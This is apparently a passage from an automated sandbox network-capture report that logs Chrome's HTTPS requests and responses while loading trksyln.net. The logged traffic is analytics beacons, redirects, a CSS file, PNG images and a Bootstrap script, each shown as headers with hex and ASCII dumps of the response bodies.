                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:24 UTC345INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 2f 70 72 69 76 61 63 79 2d 73 61 6e 64 62 6f 78 2f 72 65 67 69 73 74 65 72 2d 63 6f 6e 76 65 72 73 69 6f 6e 3f 5f 63 3d 31 26 61 6d 70 3b 63 69 64 3d 31 36 32 37 32
                                                                                                                                                                                                                                                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google-analytics.com/privacy-sandbox/register-conversion?_c=1&amp;cid=16272
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:24 UTC110INData Raw: 31 30 36 38 32 33 38 34 33 7a 61 32 30 30 26 61 6d 70 3b 6e 70 61 3d 30 26 61 6d 70 3b 74 69 64 3d 47 2d 4a 48 32 4d 4e 51 31 57 58 59 26 61 6d 70 3b 64 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 74 72 6b 73 79 6c 6e 2e 6e 65 74 25 33 46 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                      Data Ascii: 106823843za200&amp;npa=0&amp;tid=G-JH2MNQ1WXY&amp;dl=https%3A%2F%2Ftrksyln.net%3F">here</A>.</BODY></HTML>


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      9192.168.2.449768216.239.34.1814437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:24 UTC1264OUTPOST /g/collect?v=2&tid=G-JH2MNQ1WXY&gtm=45je4au0v9106823843za200&_p=1730398761454&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&cid=1627253267.1730398763&ul=en-us&sr=1280x1024&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&pae=1&frm=0&pscdl=noapi&_eu=AEA&_s=2&sid=1730398763&sct=1&seg=0&dl=https%3A%2F%2Ftrksyln.net%2FError&dr=https%3A%2F%2Ftrksyln.net%2Ftgmacro%2Fdownload&dt=trksyln%20-%20Error&en=scroll&_c=1&epn.percent_scrolled=90&_et=20&tfd=3264 HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: analytics.google.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      Origin: https://trksyln.net
                                                                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                      Referer: https://trksyln.net/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:24 UTC1030INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                      Location: https://www.google-analytics.com/privacy-sandbox/register-conversion?_c=1&cid=1627253267.1730398763&dbk=8787230659167779306&dma=0&en=scroll&gtm=45je4au0v9106823843za200&npa=0&tid=G-JH2MNQ1WXY&dl=https%3A%2F%2Ftrksyln.net%3F
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:24 GMT
                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                      Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:136:0
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=coop_reporting
                                                                                                                                                                                                                                                                                                                      Report-To: {"group":"coop_reporting","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsggc:136:0"}],}
                                                                                                                                                                                                                                                                                                                      Server: Golfe2
                                                                                                                                                                                                                                                                                                                      Content-Length: 452
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:24 UTC348INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 2f 70 72 69 76 61 63 79 2d 73 61 6e 64 62 6f 78 2f 72 65 67 69 73 74 65 72 2d 63 6f 6e 76 65 72 73 69 6f 6e 3f 5f 63 3d 31 26 61 6d 70 3b 63 69 64 3d 31 36 32 37 32
                                                                                                                                                                                                                                                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google-analytics.com/privacy-sandbox/register-conversion?_c=1&amp;cid=16272
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:24 UTC104INData Raw: 38 34 33 7a 61 32 30 30 26 61 6d 70 3b 6e 70 61 3d 30 26 61 6d 70 3b 74 69 64 3d 47 2d 4a 48 32 4d 4e 51 31 57 58 59 26 61 6d 70 3b 64 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 74 72 6b 73 79 6c 6e 2e 6e 65 74 25 33 46 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                      Data Ascii: 843za200&amp;npa=0&amp;tid=G-JH2MNQ1WXY&amp;dl=https%3A%2F%2Ftrksyln.net%3F">here</A>.</BODY></HTML>


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      10192.168.2.449769172.217.18.24437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:25 UTC989OUTGET /td/ga/rul?tid=G-JH2MNQ1WXY&gacid=1627253267.1730398763&gtm=45je4au0v9106823843za200&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101533422~101823848~101878899~101878944~101925629&z=1195082281 HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: td.doubleclick.net
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                                                      Referer: https://trksyln.net/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:25 UTC785INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:25 GMT
                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                      Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Server: cafe
                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                      Set-Cookie: test_cookie=CheckForPermission; expires=Thu, 31-Oct-2024 18:34:25 GMT; path=/; domain=.doubleclick.net; Secure; SameSite=none
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:25 UTC18INData Raw: 64 0d 0a 3c 68 74 6d 6c 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                      Data Ascii: d<html></html>
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      11192.168.2.449774160.153.155.1874437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:25 UTC651OUTGET /resources/css/projectCard.css HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: trksyln.net
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                                      Referer: https://trksyln.net/Error
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      Cookie: _ga=GA1.1.1627253267.1730398763; _ga_JH2MNQ1WXY=GS1.1.1730398763.1.0.1730398763.60.0.0
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:25 UTC296INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                                                                                                                      Last-Modified: Fri, 16 Feb 2024 11:57:18 GMT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      ETag: "0e32f4acf60da1:0"
                                                                                                                                                                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                      X-Powered-By-Plesk: PleskWin
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:25 GMT
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Content-Length: 2296
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:25 UTC2296INData Raw: ef bb bf 2f 2a 40 69 6d 70 6f 72 74 20 75 72 6c 28 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 42 61 6c 6f 6f 2b 32 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 29 3b 2a 2f 0d 0a 0d 0a 0d 0a 61 2c 20 61 3a 68 6f 76 65 72 20 7b 0d 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 63 6f 6c 6f 72 20 30 2e 33 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 0d 0a 7d 0d 0a 0d 0a 2f 2a 20 43 61 72 64 73 20 2a 2f 0d 0a 2e 70 6f 73 74 63 61 72 64 20 7b 0d 0a 20 20 20 20 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 77 68 69 74 65 3b 0d
                                                                                                                                                                                                                                                                                                                      Data Ascii: /*@import url("https://fonts.googleapis.com/css2?family=Baloo+2&display=swap");*/a, a:hover { text-decoration: none; transition: color 0.3s ease-in-out;}/* Cards */.postcard { flex-wrap: wrap; border: 2px solid white;


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      12192.168.2.449773160.153.155.1874437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:25 UTC690OUTGET /resources/img/logo.png HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: trksyln.net
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://trksyln.net/Error
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      Cookie: _ga=GA1.1.1627253267.1730398763; _ga_JH2MNQ1WXY=GS1.1.1730398763.1.0.1730398763.60.0.0
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:25 UTC297INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                                                                                                      Last-Modified: Fri, 09 Feb 2024 13:13:32 GMT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      ETag: "0a69cc7595bda1:0"
                                                                                                                                                                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                      X-Powered-By-Plesk: PleskWin
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:25 GMT
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Content-Length: 1443
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:25 UTC1443INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 7d 00 00 00 24 08 03 00 00 00 93 df c5 28 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 00 c9 50 4c 54 45 54 4c a0 5d 2f 91 6c 43 9a ff ff ff 69 40 99 6b 42 9a 6c 43 9a 5b 2c 90 64 39 96 62 36 94 5e 30 92 60 33 93 51 49 9e 52 4a 9f 66 3b 97 54 4c a0 68 3d 98 53 4b a0 59 3c 98 fc fc fd 6c 43 9a af 99 c9 71 49 9e 83 60 ab bd b1 d6 5f 57 a6 d4 d1 e7 e7 e2 f0 6e 45 9c c6 b8 da bc aa d2 e1 dc ed f2 f0 f7 6f 68 af b3 9e cc a5 8c c2 9c 97 c8 c9 c0 de 76 4f a1 f5 f4 fa f9 f8 fb 7e 78 b8 58 50 a2 ba a6 d0 7c 57 a6 88 82 bd de d6 e9 98 7b b9 ed e9 f3 d0 c5 e0 d6 cc e4 a7 a2 ce 5a 52 a3 8b 6b b0 92 74 b5 62 35 94 97 92 c5 55 4d a1 69 62 ac 96 87 c0 6c 43 9a 6c 43 9a 6c 43 9a 59 3c 98 54
                                                                                                                                                                                                                                                                                                                      Data Ascii: PNGIHDR}$(pHYs~PLTETL]/lCi@kBlC[,d9b6^0`3QIRJf;TLh=SKY<lCqI`_WnEohvO~xXP|W{ZRktb5UMiblClClCY<T


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      13192.168.2.449772160.153.155.1874437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:25 UTC691OUTGET /resources/img/error.png HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: trksyln.net
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://trksyln.net/Error
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      Cookie: _ga=GA1.1.1627253267.1730398763; _ga_JH2MNQ1WXY=GS1.1.1730398763.1.0.1730398763.60.0.0
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:25 UTC298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                                                                                                      Last-Modified: Fri, 09 Feb 2024 13:11:25 GMT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      ETag: "80fce97b595bda1:0"
                                                                                                                                                                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                      X-Powered-By-Plesk: PleskWin
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:25 GMT
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Content-Length: 3523
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:25 UTC3523INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 03 00 00 00 f4 e0 91 f9 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 77 77 77 2e 69 6e 6b 73 63 61 70 65 2e 6f 72 67 9b ee 3c 1a 00 00 00 09 70 48 59 73 00 00 03 b1 00 00 03 b1 01 f5 83 ed 49 00 00 03 00 50 4c 54 45 47 70 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 d6 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                      Data Ascii: PNGIHDRtEXtSoftwarewww.inkscape.org<pHYsIPLTEGpL3


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      14192.168.2.449777151.101.193.2294437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC588OUTGET /npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: cdn.jsdelivr.net
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      Origin: https://trksyln.net
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                      Referer: https://trksyln.net/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC773INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Content-Length: 78743
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                      Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                      X-JSD-Version: 5.0.2
                                                                                                                                                                                                                                                                                                                      X-JSD-Version-Type: version
                                                                                                                                                                                                                                                                                                                      ETag: W/"13397-kBFpUnUH/55mLPZNjjYfNZMIlw0"
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      Age: 4256
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:26 GMT
                                                                                                                                                                                                                                                                                                                      X-Served-By: cache-fra-eddf8230080-FRA, cache-dfw-kdal2120062-DFW
                                                                                                                                                                                                                                                                                                                      X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
